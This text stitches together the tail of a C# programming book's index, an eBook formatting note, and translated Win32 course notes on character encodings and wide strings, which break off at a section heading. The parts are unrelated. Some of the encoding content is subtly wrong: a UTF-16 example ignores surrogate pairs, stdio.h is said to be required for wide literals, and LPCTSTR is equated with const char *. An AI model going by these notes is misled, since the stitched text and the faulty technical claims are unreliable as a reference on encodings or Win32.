TODO comments in, 167
Vehicles, 278–283
WhileStatement, 118–121
propagating exceptions, 142–144
properties
accessibility of, 346
accessing, 344
accessors, 342–343
automatic, 353–355, 358–359, 361
declaring
automatic, 353–355, 358–359, 361
read-only, 345, 360
syntax, 341–342, 360
write-only, 345, 360
defined, 341
in expressions, 344
HasValue, 192
implementing, 361
indexers and, 370–371
interface properties
declaring, 348–349, 361
implementing, 349
naming conventions, 343–344
nullable types, 192–193
object initialization with, 356–358, 361
quick reference, 360–361
read-only, 345, 360
replacing methods with, 349–353
restrictions on, 346–347
static, 344
Value, 192
when to use, 347–348
write-only, 345, 360
Properties file, 7
PropertyChanged event, 666, 679
protected access, 278–283
protected keyword, 278, 313
public classes, 162–163
public constructors, 164
public fields, 162
public keyword, 162–163, 164, 278, 313, 505, 522
public operators, 505
Publish Web wizard, 724
Push method, 411–412
PUT requests, 733
PutCustomer method, 721
PutCustomerAsync method, 740
Q
query expressions (LINQ). See also IEnumerable interface; PLINQ (Parallel LINQ)
data aggregation, 485–487
data filtering, 484–485, 501
data grouping, 485–487, 501
data joins, 487–488, 502
data ordering, 485–487, 501
data selection, 482–484, 501
deferred evaluation, 497–500
defined, 479–480
examples of, 480–482
order of, 491
query operators, 489–491
quick reference, 501–502
Tree<TItem> objects and, 491–497
query operators, 489–491
QueryBinaryTree project, 491–497, 498–500
question mark (?)
indicating nullable types with, 191–192
nullable types, indicating with, 210
null-conditional (?) operator, 190–191, 207
queue, freachable, 320–321
Queue class
creating with generics, 384–387
creating with object type, 381–384
Queue<T> class, 385, 412, 416–417
Quick Find dialog box, 43
Quick Replace dialog box, 43
QuickWatch dialog box, 140
quotation marks, double (")
as delimiters, 111
in XML, 109
quotation marks, single ('), 111
R
raising events, 467, 469–475, 477
Random class, 231
randomCardSelector variable, 242
RanToCompletion task status, 557
ReadData method, 235
readDouble method, 74–76
reader.Dispose method, 120, 154–155
reader.ReadLine method, 120
ReaderWriterLockSlim class, 595, 609
ReadLine method, 76, 120, 322
read-only indexers, 369
read-only properties, 345, 360
Rectangle control, 659
ref keyword, 193–194, 207
ref parameters
creating, 193–194, 207
overview, 193
Parameters project, 195–196
refactoring code, 78
reference, passing by, 189
Reference Manager dialog box, 397
Reference method, 188
reference types. See also classes
copying, 183–189
defining, 183
value types compared to, 183–185
references
to assemblies, adding, 17
to classes, 292–293
dangling, 251, 319
References folder, 7–8
registration of voice commands, 690–691
relational operators, 96
associativity, 99
precedence, 99
remainder (%) operator, 48
remainderValues method, 53
remote databases, accessing, 703
data retrieval, 703–709
Entity Framework, 704
entity model, creating, 709–717, 750
quick reference, 750–751
REST web services
adding/editing data with, 733–741, 751
Azure API app security, 729–730
creating, 718–724, 750
deploying to Azure, 724–726, 750
error reporting, 742–746
idempotency, 733
PostCustomerWithHttpMessagesAsync method, 742
retrieving data with, 726–732, 750
UI updates, 746–749, 751
Remove method, 413, 415, 421, 432, 455
RemoveFirst method, 415
RemoveLast method, 415
RemoveParticipant method, 596
removing
collection elements, 432
HashSet<T>421
LinkedList<T> class, 415
List<T> class, 413
methods from delegates, 455
RenderTransform property, 651
Representational State Transfer. See REST (Representational State Transfer) web services
requestPayment method, 460
reserved words. See keywords
Reset method, 436, 439, 448
resource management
disposal methods, 321–322
Dispose method, 324–326
exception-safe disposal, 322–323, 326–328, 335
IDisposable interface, 324, 328–330
preventing objects being disposed of more than once, 330–332
quick reference, 335
thread safety, 332–333
using statements, 323–324, 335
verifying disposal after exception, 333–334
responsiveness, improving through multitasking, 525
REST (Representational State Transfer) web services
adding/editing data with, 733–741, 751
Azure API app security, 729–730
creating, 718–724, 750
deploying to Azure, 724–726, 750
error reporting, 742–746
idempotency, 733
PostCustomerWithHttpMessagesAsync method, 742
retrieving data with, 726–732, 750
UI updates, 746–749, 751
RetrieveValue method, 583
retrieving data with REST web services, 703–709, 726–732, 750
creating, 718–724
deploying to Azure, 724–726
retrieving data with, 726–732
return statement, 63–64, 93, 109
return values (method), 62
arrays as, 235–236
asynchronous methods, 578–579
method declarations, 63–64, 93
multiple, 68–70, 93
void keyword, 63
returnMultipleValues method, 68
Reverse property (BasicCollection<T> class), 445
Run method, 530, 564
DailyRate project, 73, 90–92
Factorial project, 82
Running task status, 557
S
SaveAsync method, 739, 746, 749
Say method, 699
sbyte keyword, 215
scalability
asynchronicity and, 568
improving through multitasking, 525–526
scalable user interfaces, 618–627, 655
ComboBox control, 624–625
Grid control, 619–620
TextBlock control, 620–622, 625–626
TextBox control, 622–624, 625–626
scope
bringing namespaces into, 15
methods
class, 72
local, 71
overview, 71
for statements, 123
ScreenPosition struct, 340–341, 342
property accessibility, 346
read-only properties, 345
write-only properties, 345
ScreenTips, 39
sealed classes, 306–307, 314
sealed keyword, 306–307, 313, 314
sealed methods, 307
searching with Cortana
quick reference, 701
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
vocal responses to voice commands, 697–700
voice activation, 691–695
Season enumeration
declaring, 210
enumeration variables, declaring, 210–211
security
Azure API, 729–730
pointers, 204–206
Segoe Print font, 649, 653
Select method, 482, 501
select operator, 489, 501
Select The Files To Reference dialog box, 400
selecting data, 482–484, 501
Selection project, 102–106
semantics, 35–36
SemaphoreSlim class, 595, 609
semicolon (;)
in enumeration variable declarations, 227
in method declarations, 63
statement termination, 35–36, 38
in structure variable declarations, 227
sentinel variables, 117
serializing method calls, 607
SerialPI method, 600–603
SerialTest method, 592
set accessor method
indexers, 368–369, 379
interface properties, 348–349
properties, 342–343
SetColor method, 300, 302, 351
SetLocation method, 299, 350
shallow copies, 185, 237–238
shared fields, 174–175
ShipOrder method, 460, 463
Shipper class, 460, 470–475
ShippingCompleteDelegate, 471
ShipProcessingComplete event, 472
short keyword, 215
short-circuiting Boolean operators, 97–98
ShowAsync method, 580
showBoolValue method, 46
showDoubleValue method, 46
showFloatValue method, 44
showIntValue method, 45
showResult method, 63–65
showStepsClick method, 125–126
at sign (@), 184
SignalAndWait method, 596
signatures, method, 273
simulators, testing UWP applications with, 628–630
single quotation marks (')
as delimiters, 111
in XML, 109
Single structure, 214
single-threaded applications, 525
Skip method, 491
Sleep method, 551
.sln file extension, 41
slowMethod method, 569–571
Solution Explorer pane, 6
solutions. See projects
Sort method, 407, 413
SortedDictionary<TKey, TValue> class, 420
SortedList<TKey, TValue> class, 412, 420–421
sources, event, 465
speech synthesis, 697–700
speechRecognitionResult object, 691
SpeechSynthesizer class, 699
spinning, 586
SpinWait method, 586
Split method, 589, 693
splitting strings, 589, 693
SQL (Structured Query Language), 480, 710
Sqrt method, 171, 173–174
square brackets ([ ]), 54, 229, 252
Square class, 298–300, 316
square roots, calculating, 171
stack
boxing and, 199–200, 207
purpose of, 196–198
storing data on, 198–199
unboxing, 200–201
Stack<T> class, 412, 417–418
StackOverflowException, 344
Start Debugging command (Debug menu), 34, 70
Start method, 530, 564
Start Without Debugging command (Debug menu), 13, 34, 90
StartCheckoutProcessing method, 462
StartEngine method, 279
for statements
blocks, 122
Cards project, 247–248
iteration through arrays, 233–235
multiple initializations and updates in loop, 123
scope, 123
syntax, 121–122
statements. See also keywords
break, 109, 124
checked/unchecked, 145
continue, 124
defined, 35–36
do
blocks, 124
example of, 132
stepping through, 127–131
syntax, 124
writing, 125–127
finally, 154–155, 156, 318, 322
for
blocks, 122
Cards project, 247–248
iteration through arrays, 233–235
multiple initializations and updates in loop, 123
scope, 123
syntax, 121–122
foreach
arrays, iterating through, 234–235, 252
canceling, 557–558
collections, iterating through, 413, 415, 417–418, 419, 433, 448
goto, 109
if
blocks, 100–101
cascading, 101–106
common errors in, 100
if…else, 203
syntax, 99–100, 112–113
when to use, 99
lock, 332–333, 593, 609
quick references, 112–113, 132
return, 63–64, 93, 109
switch, 203–204
rules for, 108–109
SwitchStatement exercise, 109–112
syntax, 107–108, 113
when to use, 107
syntax of, 35–36
throw
catch handler, 151–153
example of, 149–153, 156
throw exceptions, 153–154
try/catch blocks
example of, 156
multiple catch handlers, 136–137
multiple exceptions, catching, 137–138
syntax, 134–135
when keyword, 138–142
try/finally blocks, 318, 322
using, 15, 17, 335
garbage collection, 323–324
static, 176–178
while
blocks, 118
example of, 132
nesting, 117
sentinel variable, 117
syntax, 117
terminating, 117
writing, 118–121
static fields
accessing, 181
creating, 175, 181
shared, 174–175
static keyword, 522
static methods, 173–174, 181
static operators, 505
static properties, 344
static using statements, 176–178
StaticResource keyword, 647
stdarg.h file, 258
stepping through
methods, 78–81, 94
statements, 127–131
StopEngine method, 279
StopFolding method, 464
StopWatch object, 534
StorageFile class, 581
String class, 184
string data type, 40
string keyword, 184, 215
String.IsNullOrEmpty method, 376
strings, 184
concatenating, 47–48
converting to integers, 47, 59
converting values to, 365, 368
determining if empty, 376
determining if null, 376
interpolation, 48
splitting, 589, 693
struct keyword, 216, 227
StructsAndEnums project, 212–214, 220–223, 224–225
structure variables
copying, 223
declaring, 218, 227
initializing, 227
nullable, 218
Structured Query Language (SQL), 480, 710
structures, 214
classes compared to, 217–218
common types, 214–215
comparing operators in, 509–510
Date, 220–221
declaring, 216, 227
indexers in, 379
initializing, 219–223
IntBits, 367–368
Name, 373
operators and, 216
PhoneNumber, 373–375
quick reference, 227
ScreenPosition, 340–341, 342
property accessibility, 346
read-only properties, 345
write-only properties, 345
StructsAndEnums project, 224–225
structure variables
copying, 223
declaring, 227
initializing, 227
nullable, 218
System.Int32, 398
Time
declaring, 216
initializing, 219–220
structure variables, declaring, 218
variable declarations, 218
Windows Runtime compatibility, 226
Wrapper, 370–371
styles, applying to user interfaces, 646–654, 655
subscribing to events, 466–467, 476
subtraction (-) operator, 47
subtractValues method, 52
subtrees, binary, 388
Sum method, 260–263, 264
sumTotal variable, 262
SuppressFinalize method, 331
Swap<T> method, 399
switch statement, 203–204
rules for, 108–109
SwitchStatement exercise, 109–112
syntax, 107–108, 113
when to use, 107
SwitchStatement project, 109–112
symmetric operators, 506–507, 519
synchronization primitives for coordinating tasks, 593–594
synchronizing
concurrent access to data
concurrent collection classes, 597
locked data, 593–594
overview, 590–593
synchronization primitives for coordinating tasks, 593–594, 596–597
thread-safe data access, implementing, 598–607
tasks, 531
threads, 594, 609
Synchronous I/O anti-pattern, 568
System.Array class. See arrays
System.Collections namespace, 412
System.Collections.Concurrent namespace, 412
System.Collections.Generic namespace, 386–387, 411
System.Collections.IEnumerable interface, 435, 441–443
System.Collections.IEnumerator interface, 436
System.IComparable interface, 391–393
System.IComparable<T> interface, 391–393
System.Int32 structure, 214, 398
System.Int64 structure, 214
System.Linq namespace, 489
System.Numerics namespace, 511
System.Object class, 199, 270, 383. See also objects
System.Random class, 231
System.Single structure, 214
System.String class, 184
System.Threading namespace, 528, 594
System.Threading.Tasks namespace, 527
System.ValueTuple structure, 214
System.ValueType abstract class, 269
System.ValueType package, 173
T
Take method, 491
TakeOff method, 279
Task class, 528–529. See also Task objects
Task Manager
CPU utilization, monitoring, 536–538
launching, 536
Task objects. See tasks
Task<TResult> class, 578
TaskContinuationOptions enumeration, 530–531
TaskCreationOptions object, 530
tasks
abstracting, 545–549
asynchronous methods and, 582–583
canceling
cancellation tokens, 551–552
cooperative cancellation, 551–561, 566
continuations, 530–531, 563–564, 565
CPU bottlenecks, identifying, 533–545
creating, 529, 564
exception handling, 562–563, 565
faulted
continuations with, 563–564
Faulted task status, 557
Parallel class
abstracting classes with, 545–549
ForEach<T> method, 546, 565
Invoke method, 546, 565
For method, 545–546, 565
when to use, 549–551
parallelism
implementing, 531–538, 565
Parallel class, 545–551
quick reference, 564–566
running, 530, 564
synchronization primitives for coordinating tasks, 593–594
synchronizing, 531
Task class, 528–529
threads, 528–529
waiting for, 531, 564–565
Tasks namespace, 527
TemperatureMonitor class, 466–467
templates
ASP.NET Web API, 722
Blank App, 615–617, 655
terminating while statements, 117
TestHello project, 3–14
building and running, 11–14
files, 7–8
IntelliSense icons, 11
Main method, 8–10
namespaces
assemblies and, 17
bringing into scope, 15
defining classes in, 14–15
longhand names, 16
TestIfTrue method, 586
testing
Cortana searches, 695–696
for null values, 190–191
Tree<TItem> class, 396–399
UWP (Universal Windows Platform) applications, 628–630
TestReader class, 321–322
TextBlock control, 21–24
in scalable user interface, 620–622, 625–626
styles applied to, 649–651
TextBox control, 622–624, 625–626, 661, 664–665
TextReader class, 119
ThenBy method, 486
ThenByDescending method, 486
this keyword, 284, 288, 368, 378
Thread class, 528
thread safety
Dispose method and, 332–333
thread-safe data access, 598–607
Threading namespace, 528, 594
ThreadPool class, 528–529
threads, 525. See also tasks
concurrent, 605
defined, 572
single-threaded applications, 525
suspending execution of, 531
synchronizing, 594, 609
Thread class, 528
thread safety
Dispose method and, 332–333
thread-safe data access, 598–607
Threading namespace, 528, 594
ThreadPool class, 528–529
Thread.Sleep method, 551
throw exceptions, 153–154
throw statement
catch handler, 151–153
example of, 149–153, 156
throw exceptions, 153–154
ThrowIfCancellationRequested method, 559, 560
throwing exceptions
catch handler, 151–153
example of, 156
finally blocks, 154–155
throw exceptions, 153–154
throw statement, 149–153
tilde (~)
destructor declarations, 317, 335
NOT (~) operator, 365
Time structure
declaring, 216
initializing, 219–220
structure variables, declaring, 218
ToArray method, 427, 497, 500, 502
ToChar method, 127
TODO comments, 167
tokens, cancellation, 551–552, 590
ToList method, 497, 500, 502
ToString method, 45, 59, 67, 210–211, 214, 221, 245, 274, 365, 378, 512
Tree<TItem> class
creating, 392–396
enumerator, defining, 445–447
querying data in, 491–497
testing, 396–399
TreeEnumerator class, 437–439
trees, binary. See binary trees
TResult parameter (Select method), 483
Triangle class, 356–357
troubleshooting. See exceptions
try statement, 134–135
try/catch blocks
multiple catch handlers, 136–137
multiple exceptions, catching, 137–138
syntax, 134–135
when keyword, 138–142
try/finally blocks, 318, 322
TSource parameter (Select method), 483
tuples, 173, 214
defined, 68
returning from methods, 68–70, 93
two-way data binding, 664–665, 700
types. See value types
type-safe classes. See generics
typeSelectionChanged method, 43
U
uint data type, 364
uint keyword, 215
ulong keyword, 215
unary operators, 56, 98, 504
unassigned local variables, 40
unboxing, 200–201
unchecked integer arithmetic, 144–145
unchecked keyword, 144–145
expressions, 146–148
statements, 145
underscore (_), 38, 364
unhandled exceptions, 135–136
Union method, 491
UnionWith method, 421
Universal Windows Platform applications. See UWP (Universal Windows
Platform) applications
unsafe code, pointers and, 204–206
unsafe keyword, 205–206
unsigned int (uint) data type, 364
unsubscribing from events, 467, 476
updating
databases, 733–741
user interfaces, 746–749
user experience (UX), 612
user interfaces, 611–612. See also data binding
adapting with Visual State Manager, 639–645
displaying data in, 658–664
events, 468–469
modifying data with, 664–669
INotifyPropertyChanged interface, 665–668, 700
nameof operator, 668–669
two-way data binding, 664–665, 700
quick reference, 655
scalable, 618–627, 655
ComboBox control, 624–625
Grid control, 619–620
TextBlock control, 620–622, 625–626
TextBox control, 622–624, 625–626
styles applied to, 646–654, 655
tabular layout, 630–639
updating with REST web services, 746–749, 751
user-defined conversion operators, 518
ushort keyword, 215
using statements, 15, 17
garbage collection, 323–324, 335
static, 176–178
Util class, 285
Min method, 256–257
Sum method, 260–263, 264
UWP (Universal Windows Platform) applications, 50, 226. See also
asynchronous methods
building with Blank App template, 615–617, 655
Cortana searches
quick reference, 701
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
voice activation, 691–695
creating in Visual Studio 2017, 18–27, 34
adding code to, 30–32
App.xaml.cs file, 28–30
building and running, 25–26, 34
Button control, 24–25
MainPage.xaml.cs file, 27–28
pages in, 21
TextBlock control, 21–24
views of, 18
data binding
with ComboBox control, 669–671
displaying data with, 658–664
INotifyPropertyChanged interface, 665–668, 700
modifying data with, 664–669
nameof operator, 668–669
quick reference, 700–701
two-way, 664–665, 700
features of, 612–615
life cycle of, 613
multitasking
advantages of, 525–526
multicore processors, 526–527
.NET Framework and, 527
MVVM (Model-View-ViewModel) pattern, 657–658
online resources, 612, 615
remote databases, accessing, 703
data retrieval, 703–709
Entity Framework, 704
entity model, creating, 709–717, 750
error reporting, 742–746
quick reference, 750–751
REST web services
adding/editing data with, 733–741, 751
Azure API app security, 729–730
creating, 718–724, 750
deploying to Azure, 724–726, 750
idempotency, 733
PostCustomerWithHttpMessagesAsync method, 742
retrieving data with, 726–732, 750
UI updates, 746–749, 751
tasks
abstracting, 545–549
cancel, 545–549
continuations, 530–531, 563–564, 565
CPU bottlenecks, identifying, 533–545
creating, 529, 564
exception handling, 562–563, 565
faulted, 557, 563–564
Parallel class, 545–551
parallelism, 531–538, 545–551, 565
quick reference, 564–566
running, 530, 564
synchronizing, 531
Task class, 528–529
threads, 528–529
waiting for, 531, 564–565
testing, 628–630
user interfaces, 611–612
adapting with Visual State Manager, 639–645
displaying data in, 658–664
modifying data with, 664–669
quick reference, 655
scalable, 618–627, 655
styles applied to, 646–654, 655
tabular layout, 630–639
ViewModel
adding commands to, 675–685
creating, 671–675
vocal responses to voice commands, 697–700
UX (user experience), 612
V
ValidateCustomer method, 735, 739, 743–744, 748
validPercentage method, 97
Value enumeration, 241
value keyword, 369
Value method, 186–187
Value property, 192
value types
Action, 529, 676
arithmetic operators and, 47–49
in arrays, 249–251
binary
binary notation, 364
displaying, 365
hexadecimal notation, 364
manipulating, 365–366
0b prefix, 364
operators for, 365–366
storing, 364
boxing, 199–200, 207
casting, 202, 207
InvalidCastException, 201
is operator, 202
as operator, 202–203
switch statement, 203–204
copying, 183–189, 206, 216
double, converting to int, 517
enumerations
declaring, 210, 227
enumeration variables, 210–211, 227
literal values, 211
nullable, 210
overview, 209
StructsAndEnums project, 212–214
underlying types, 212
Func, 676
int
arithmetic operators and, 49–54
in array arguments, 256–257
checked versus unchecked arithmetic, 144–148
converting double type to, 517
converting strings to, 47, 59
converting to double, 517
minimum/maximum value of, 144
overview, 40
in parameter arrays, 257–258
uint (unsigned int), 364
null
null-conditional (?) operator, 190–191, 207
overview, 189–190
testing for, 190–191
nullable, 210
overview, 191–192
properties of, 192–193
numeric
displaying when last updated, 41–46
infinite values, 49
specifying, 39–40
out parameters, 194–195, 207
primitive
displaying values of, 41–46
table of, 40
quick reference, 206–207, 227
ref parameters
creating, 193–194, 207
overview, 193
Parameters project, 195–196
reference types compared to, 183–185
structures, 214
classes compared to, 217–218
common types, 214–215
declaring, 216, 227
initializing, 219–223
operators and, 216
StructsAndEnums project, 224–225
structure variables, 223, 227
variable declarations, 218
Windows Runtime compatibility, 226
uint, 364
unboxing, 200–201
Windows Runtime compatibility, 311–313
values. See also value types
assigning to variables, 39, 59
returning from methods
method calls, 68–70
method declarations, 63–64, 93
multiple return values, 68–70, 93
void keyword, 63
unassigned, 40
ValueTuple package, installing, 70
ValueTuple structure, 214
ValueType abstract class, 269
ValueType package, 173
var keyword, 58, 62, 179, 484
varargs macros, 258
variables. See also values
array
declaring, 229–230
instantiating, 230–231
assigning values to, 39, 59
Boolean, 95–96, 112
currentCustomer, 673
declaring, 38–39, 59
decrementing, 56–57, 59, 116
defined, 37–38
enumeration variables
assigning to values, 227
declaring, 210–211, 227
operators and, 211
implicitly typed local, 57–58
incrementing, 56–57, 59, 116
initializing, 189–190, 441
naming, 38
null
null-conditional (?) operator, 190–191
overview, 189–190
testing for, 190–191
nullable
overview, 191–192
properties of, 192–193
pointers, 204–206
quick reference, 59
randomCardSelector, 242
sentinel, 117
structure
copying, 223
declaring, 218, 227
initializing, 227
nullable, 218
sumTotal, 262
unassigned local, 40
variadic methods, 256
variance, generic interfaces and, 402–404
VCD (voice-command definition) files, 687–690
Vehicle class, 279
Vehicles project, 278–283
ViewModel object, 734–740
adding commands to, 675–685
ICommand interface, 675–678, 701
NextCustomer command, 679–682
Next/Previous buttons, 682–685
PreviousCustomer command, 679–682
adding/editing data with, 731
creating, 671–675
error reporting, 743–746
MVVM (Model-View-ViewModel) pattern, 657–658
UI updates, 746–748
virtual keyword, 275, 288, 313
virtual machines, 226
virtual methods
declaring, 274–275
polymorphism and, 277, 288
Visual State Manager, adapting user interfaces with, 639–645
Visual Studio 2017
Code and Text Editor window, 6
console applications
creating in Visual Studio 2017, 3–14, 34
defined, 3
namespaces, 14–17
graphical applications, creating, 18–27, 34
adding code to, 30–32
App.xaml.cs file, 28–30
building and running, 25–26, 34
Button control, 24–25
MainPage.xaml.cs file, 27–28
pages in, 21
TextBlock control, 21–24
views of, 18
WPF App template, 33
Implement Interface Wizard, 292
quick reference, 34
Solution Explorer pane, 6
VMs (virtual machines), 226
vocal responses to voice commands, 697–700
voice activation, 691–695
registration of voice commands, 690–691
VCD (voice-command definition) files, 687–690
vocal responses to voice commands, 697–700
voice-command definition (VCD) files, 687–690
VoiceCommandActivatedEventArgs object, 691
VoiceCommandDefinitionManager, 691
void keyword, 63
W
Wait method, 531, 564
WaitAll method, 531, 565
WaitAny method, 531
waiting for tasks, 531, 564–565
WaitingToRun task status, 556
WalkTree method, 396
when keyword, 138–142
where keyword, 401, 408, 489, 501
Where method, 484–485, 501
while statements
blocks, 118
example of, 132
nesting, 117
sentinel variable, 117
syntax, 117
terminating, 117
writing, 118–121
WhileStatement project, 118–121
white space, 36
widening conversions, 517
Windows applications, indexers in, 372–378
Windows Phone SDK 8.0, 611
WinRT (Windows Runtime), 611
asynchronous methods and, 580–582
compatibility with, 226, 311–313
WithCancellation method, 590, 608
wizards
Add Scaffold, 718
Entity Data Model, 712–716
Extract Method, 78
Generate Method Stub, 74–77, 93
Implement Interface, 292
Publish Web, 724
WPF App template, 33
WrappedInt class, 187
Wrapper structure, 370–371
Wrapper<T> class, 403
Write method, 76, 582
WriteableBitmap object, 532–534, 582
WriteAsync method, 582
writeFee method, 77
WriteLine method, 40, 73, 214, 255–256, 260
write-only indexers, 369
write-only properties, 345, 360
X-Y-Z
XAML (Extensible Application Markup Language), 20. See also user
interfaces
App.xaml.cs file, 28–30
MainPage.xaml files, 27–28, 639
namespace declarations, 616
XML (Extensible Markup Language), special characters in, 109
XOR (^) operator, 366
yield keyword, 444, 448
Code Snippets
Many titles include programming code or configuration examples. To
optimize the presentation of these elements, view the eBook in single-
column, landscape mode and adjust the font size to the smallest setting. In
addition to presenting code and configurations in the reflowable text format,
we have included images of the code that mimic the presentation found in the
print book; therefore, where the reflowable format may compromise the
presentation of the code listing, you will see a “Click here to view code
image” link. Click the link to view the print-fidelity code image. To return to
the previous page viewed, click the Back button on your device or app.
滴水 (Dripping Water) Reverse Engineering Course Notes: Win32

1 Course Introduction

Many people have a mistaken impression of Win32: they think Win32 is just about drawing user interfaces, and ask why anyone already learning MFC would still study Win32. Win32 is not for drawing interfaces. If you want to write good Windows programs, you must learn Win32; approach it with the right attitude.
2 Character Encoding

We constantly run into all kinds of character encodings; this chapter walks through the common ones.

2.1 The original ASCII encoding

Computers were invented in the United States, so the earliest encoding only had to cover the characters its designers needed, and ASCII was entirely sufficient. Once computers spread worldwide, however, many countries write with ideographic scripts, and ASCII cannot represent them.
2.2 Extending ASCII: GB2312 (GB2312-80)

Because ASCII could not meet the demand, it was extended. Standard ASCII only defines codes 0 to 127 (0x00 to 0x7F); the range 0x80 to 0xFF does not exist in standard ASCII, and that is where the so-called ASCII extensions live.

Can a single extended table like that satisfy ideographic scripts such as Chinese or Korean? Not really; such a table sees very little use on its own. The GB2312 encoding (not fundamentally different from GBK; they differ only in how many characters and symbols they collect: the GB2312 standard contains 6,763 Chinese characters, while GBK contains 21,886 characters and graphic symbols) takes over that range in a different way: in essence it defines two such tables and joins them, so that two bytes together form one Chinese character.

For example, the character 中 ("middle") is formed by joining the bytes 0xD6 and 0xD0. Does this encoding have problems? Certainly. Knowing how it is built, suppose we send the two characters 中国 to a friend abroad whose computer does not have this code table: the bytes will not decode to Chinese characters, and the familiar "mojibake" garbage appears instead.
2.3 Unicode

To fix ASCII's shortcomings, Unicode was born. How does Unicode solve the problem? Simple: Unicode defines one table containing every writing system in the world; every character that exists is assigned a unique code point.

Unicode code points range from 0x0 to 0x10FFFF, room for more than a million symbols. But Unicode by itself has a problem: it is only a character set. It assigns each symbol a number, yet it says nothing about how that number should be stored.

Suppose 中 takes 2 bytes to represent as Unicode while 国 takes 4; how do you store them side by side?
2.4 How Unicode is stored

2.4.1 UTF-16

UTF-16 and UTF-8 are storage formats for Unicode. UTF-16 uses 16-bit unsigned integers as its code unit. Note that the unit is 16 bits; that does not mean every character is only 16 bits. Depending on which range the character's code point falls in, it may occupy 2 bytes or 4 bytes. When people say "Unicode" on today's machines, they usually mean UTF-16.

An example (deliberately fictional):

中 (Unicode code point): 0x1234
国 (Unicode code point): 0x12345

Stored as UTF-16, 中 is simply 0x1234. 国 is different: since UTF-16 works in 16-bit (2-byte) units, 国 would be split and stored as 0x00 0x01 0x23 0x45.

UTF-16's advantage is obvious at a glance: computing, splitting, and parsing are very convenient; you walk the data two bytes at a time. Is UTF-16 the best answer? Not quite. The example above shows an equally obvious drawback: UTF-16 can waste space. Because its unit is 16 bits (2 bytes), it must pad for alignment: the letter A needs only one byte, but under UTF-16 it becomes two, which is wasteful. (For local storage that only costs a little disk space, but for network transmission it is far too expensive.) This is where UTF-8 enters the picture.
2.4.2 UTF-8

UTF-8 is a variable-length storage scheme: storage is allocated according to the character. The letter A gets one byte, while the Chinese character 中 gets three.

Advantage: it saves space. Drawback: parsing is more work.

UTF-8 storage follows a range table. For example, the letter A falls in the range 0x000000 to 0x00007F, so it is stored as a single byte of the form 0xxxxxxx, exactly as one byte of ASCII, changing nothing. The character 中 is different:

中 (Unicode code point): 0x4E 0x2D, which falls in the range 0x000800 to 0x00FFFF.

0x4E2D = 0100 1110 0010 1101. Stored as UTF-8 this becomes 1110(0100) 10(111000) 10(101101), where the bits wrapped in parentheses are 中's Unicode code point spread across the three bytes.

One last question: suppose we send UTF-8 text to someone. What if they parse it as UTF-16? How do we make the receiver decode it only as UTF-8?
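To make the range table concrete, here is a minimal sketch (my own illustration, not course code) that encodes a single code point up to U+FFFF into UTF-8 bytes, following the rules above:

#include <stdio.h>

int EncodeUtf8(unsigned int cp, unsigned char out[3]) // returns the byte count
{
    if (cp <= 0x7F) {                      // 0xxxxxxx
        out[0] = (unsigned char)cp;
        return 1;
    } else if (cp <= 0x7FF) {              // 110xxxxx 10xxxxxx
        out[0] = (unsigned char)(0xC0 | (cp >> 6));
        out[1] = (unsigned char)(0x80 | (cp & 0x3F));
        return 2;
    } else {                               // 1110xxxx 10xxxxxx 10xxxxxx
        out[0] = (unsigned char)(0xE0 | (cp >> 12));
        out[1] = (unsigned char)(0x80 | ((cp >> 6) & 0x3F));
        out[2] = (unsigned char)(0x80 | (cp & 0x3F));
        return 3;
    }
}

int main()
{
    unsigned char buf[3];
    int n = EncodeUtf8(0x4E2D, buf);       // 中
    for (int i = 0; i < n; i++) printf("%02X ", buf[i]); // prints E4 B8 AD
    return 0;
}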
2.5 BOM (Byte Order Mark)

A BOM (byte order mark) is inserted at the very beginning of a text file to identify which Unicode encoding the file uses.
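The standard BOM byte sequences are:

Encoding      BOM bytes
UTF-8         EF BB BF
UTF-16 LE     FF FE
UTF-16 BE     FE FF
UTF-32 LE     FF FE 00 00
UTF-32 BE     00 00 FE FF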
3 Wide Characters in C

This chapter shows how to represent strings in C using the encodings described in the previous chapter.

ASCII: char strBuff[] = "中国";
Unicode (UTF-16): wchar_t strBuff[] = L"中国"; (the L before the quotes is required; without it the compiler stores the literal in the source file's own encoding. Note that you need to include stdio.h to use this.)

This Unicode form is exactly what "wide characters" means; whenever wide characters come up, think of this representation.

ASCII and Unicode strings are laid out differently in memory, so each has its own family of C runtime functions: the narrow (char) functions on one side and their wide (wchar_t) counterparts on the other.

For example, suppose we want to print a wide-character string to the console.
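The original showed this as a screenshot; a minimal equivalent sketch follows (the setlocale call is my addition: without it, many consoles will not render wide strings usefully):

#include <stdio.h>
#include <locale.h>

int main()
{
    setlocale(LC_ALL, "");          // let the console use the local code page
    wchar_t strBuff[] = L"中国";
    wprintf(L"%ls\n", strBuff);     // the wide-character counterpart of printf
    return 0;
}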
Another example is string length:

char strBuff[] = "China";
wchar_t strBuff1[] = L"China";
strlen(strBuff);   // length in characters of the multibyte string, excluding the terminating 00
wcslen(strBuff1);  // length in characters of the wide string, excluding the terminating 00 00
4 Wide Characters in the Win32 API

4.1 What is the Win32 API?

The Win32 API is the set of functions (application programming interfaces) that the Windows operating system provides to us. They live mainly in the thousands of DLL files under C:\Windows\System32 (64-bit DLLs) and C:\Windows\SysWOW64 (32-bit DLLs).

The important DLLs:

1. Kernel32.dll: the most central module, covering memory management, process and thread functions, and so on;
2. User32.dll: the Windows user-interface APIs, for example creating windows and sending messages;
3. GDI32.dll: the Graphical Device Interface, containing the functions used to draw and display text.

To use the Win32 API in C, just include the windows.h header.

Suppose we want to pop up a message box. The Win32 API documentation gives the following format:

int MessageBox(
    HWND hWnd,         // handle to owner window
    LPCTSTR lpText,    // text in message box
    LPCTSTR lpCaption, // message box title
    UINT uType         // message box style
);

This code may look frightening, as if we had never seen any of these types, but they are nothing new: the "new" types are just new names for the old ones. Unifying the type names makes code easier to read and write, and if the code ever has to move to another platform, only the type definitions need to change, not the code itself.

Take LPCTSTR from the code above: follow the definition (select it and press F12) and you will find it is essentially const char * under another name.

All the commonly used data types have been renamed like this in Win32.

4.2 Using strings in Win32

Character types:

CHAR strBuff[] = "中国";        // char
WCHAR strBuff[] = L"中国";      // wchar_t
TCHAR strBuff[] = TEXT("中国"); // TCHAR resolves to char or wchar_t from the project's encoding; the recommended form in Win32

String pointers:

PSTR strPoint = "中国";         // char*
PWSTR strPoint = L"中国";       // wchar_t*
PTSTR strPoint = TEXT("中国");  // PTSTR resolves to char* or wchar_t* from the project's encoding; the recommended form in Win32

4.3 Showing a message box with the Win32 API

